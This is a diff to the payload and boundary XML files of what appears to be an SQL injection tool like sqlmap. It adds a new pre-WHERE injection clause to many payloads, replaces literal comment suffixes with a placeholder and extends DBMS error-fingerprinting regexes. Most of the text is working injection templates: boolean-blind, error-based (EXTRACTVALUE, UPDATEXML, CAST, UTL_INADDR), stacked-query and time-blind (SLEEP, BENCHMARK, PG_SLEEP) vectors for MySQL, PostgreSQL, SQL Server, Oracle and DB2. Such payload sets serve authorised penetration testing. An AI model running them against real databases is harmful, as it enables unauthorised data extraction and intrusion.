         <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -509,7 +546,7 @@ Formats:
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -518,7 +555,7 @@ Formats:
         <where>1,2</where>
         <ptype>4</ptype>
         <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -527,27 +564,16 @@ Formats:
         <where>1,2</where>
         <ptype>1</ptype>
         <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
-    </boundary>
-    <!-- End of pre-WHERE derived table boundaries -->
-
-    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
     </boundary>
 
     <boundary>
-        <level>5</level>
+        <level>4</level>
         <clause>1</clause>
         <where>1</where>
-        <ptype>2</ptype>
+        <ptype>1</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -555,19 +581,10 @@ Formats:
         <clause>1</clause>
         <where>1</where>
         <ptype>1</ptype>
-        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
-
+    <!-- End of pre-WHERE derived table boundaries -->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
-    </boundary>
-    <!-- End of INSERT/UPDATE generic boundaries -->
 
     <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
     <boundary>

xml/errors.xml

@@ -7,6 +7,7 @@
         <error regexp="Warning.*mysql_.*"/>
         <error regexp="MySqlException \(0x"/>
         <error regexp="valid MySQL result"/>
+        <error regexp="check the manual that corresponds to your MySQL server version"/>
         <error regexp="MySqlClient\."/>
         <error regexp="com\.mysql\.jdbc\.exceptions"/>
     </dbms>
@@ -31,6 +32,7 @@
         <error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
         <error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
         <error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
+        <error regexp="Microsoft SQL Native Client.*[0-9a-fA-F]{8}"/>
     </dbms>
 
     <!-- Microsoft Access -->
@@ -43,7 +45,7 @@
 
     <!-- Oracle -->
     <dbms value="Oracle">
-        <error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
+        <error regexp="\bORA-\d{5}"/>
         <error regexp="Oracle error"/>
         <error regexp="Oracle.*Driver"/>
         <error regexp="Warning.*\Woci_.*"/>
@@ -55,7 +57,7 @@
         <error regexp="CLI Driver.*DB2"/>
         <error regexp="DB2 SQL error"/>
         <error regexp="\bdb2_\w+\("/>
-        <error regexp="(?i)SQLSTATE.+SQLCODE"/>
+        <error regexp="SQLSTATE.+SQLCODE"/>
     </dbms>
 
     <!-- Informix -->
@@ -87,9 +89,11 @@
 
     <!-- Sybase -->
     <dbms value="Sybase">
-        <error regexp="(?i)Warning.*sybase.*"/>
+        <error regexp="Warning.*sybase.*"/>
         <error regexp="Sybase message"/>
         <error regexp="Sybase.*Server message.*"/>
+        <error regexp="SybSQLException"/>
+        <error regexp="com\.sybase\.jdbc"/>
     </dbms>
 
     <!-- Ingres -->

xml/payloads/01_boolean_blind.xml

@@ -53,6 +53,7 @@ Tag: <test>
             6: TOP
             7: Table name
             8: Column name
+            9: Pre-WHERE (non-query)
 
         A comma separated list of these values is also possible.
 
@@ -159,7 +160,7 @@ Tag: <test>
         <stype>1</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [INFERENCE]</vector>
         <request>
@@ -175,7 +176,7 @@ Tag: <test>
         <stype>1</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [INFERENCE]</vector>
         <request>
@@ -191,7 +192,7 @@ Tag: <test>
         <stype>1</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR NOT [INFERENCE]</vector>
         <request>
@@ -212,7 +213,7 @@ Tag: <test>
         <vector>AND [INFERENCE]</vector>
         <request>
             <payload>AND [RANDNUM]=[RANDNUM]</payload>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
         </request>
         <response>
             <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
@@ -229,7 +230,7 @@ Tag: <test>
         <vector>OR [INFERENCE]</vector>
         <request>
             <payload>OR [RANDNUM]=[RANDNUM]</payload>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
         </request>
         <response>
             <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
@@ -246,7 +247,7 @@ Tag: <test>
         <vector>OR NOT [INFERENCE]</vector>
         <request>
             <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
         </request>
         <response>
             <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>

xml/payloads/02_error_based.xml

@@ -7,7 +7,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
         <request>
@@ -31,7 +31,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
         <where>1</where>
         <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
@@ -56,7 +56,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
         <request>
@@ -80,7 +80,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
         <where>1</where>
         <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
@@ -105,7 +105,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
         <request>
@@ -129,7 +129,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
         <where>1</where>
         <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
@@ -154,7 +154,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
         <request>
@@ -174,7 +174,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
         <request>
@@ -194,7 +194,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
@@ -219,7 +219,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
@@ -243,7 +243,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
         <request>
@@ -268,7 +268,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
         <request>
@@ -293,7 +293,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
         <request>
@@ -313,7 +313,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
         <request>
@@ -332,7 +332,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
         <request>
@@ -351,7 +351,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
         <request>
@@ -372,7 +372,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
         <request>
@@ -393,7 +393,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
         <request>
@@ -414,7 +414,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
         <request>
@@ -435,7 +435,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
         <request>
@@ -454,7 +454,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
         <request>
@@ -473,7 +473,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -493,7 +493,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -513,7 +513,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -532,7 +532,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -551,7 +551,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -570,7 +570,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -589,7 +589,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -608,7 +608,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>2</where>
         <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
         <request>
@@ -655,7 +655,7 @@
         <stype>2</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
         <request>
@@ -679,7 +679,7 @@
         <stype>2</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
         <request>
@@ -703,7 +703,7 @@
         <stype>2</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
         <request>
@@ -727,7 +727,7 @@
         <stype>2</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
         <request>
@@ -747,7 +747,7 @@
         <stype>2</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
@@ -771,7 +771,7 @@
         <stype>2</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
         <request>
@@ -790,7 +790,7 @@
         <stype>2</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
         <request>

xml/payloads/04_stacked_queries.xml

@@ -450,7 +450,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
         <request>
@@ -470,7 +470,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
         <request>
@@ -571,7 +571,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
         <request>
@@ -591,7 +591,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
         <request>

xml/payloads/05_time_blind.xml

@@ -7,7 +7,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -27,7 +27,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -47,7 +47,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -68,7 +68,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -89,7 +89,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
@@ -109,7 +109,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
@@ -129,7 +129,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
@@ -150,7 +150,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
@@ -171,7 +171,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -191,7 +191,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -211,7 +211,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -232,7 +232,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -253,7 +253,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -273,7 +273,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -294,7 +294,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
         <request>
@@ -314,7 +314,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
         <request>
@@ -335,7 +335,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -355,7 +355,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -374,7 +374,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -394,7 +394,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -414,7 +414,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -434,7 +434,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -454,7 +454,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -475,7 +475,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -496,7 +496,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -515,7 +515,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
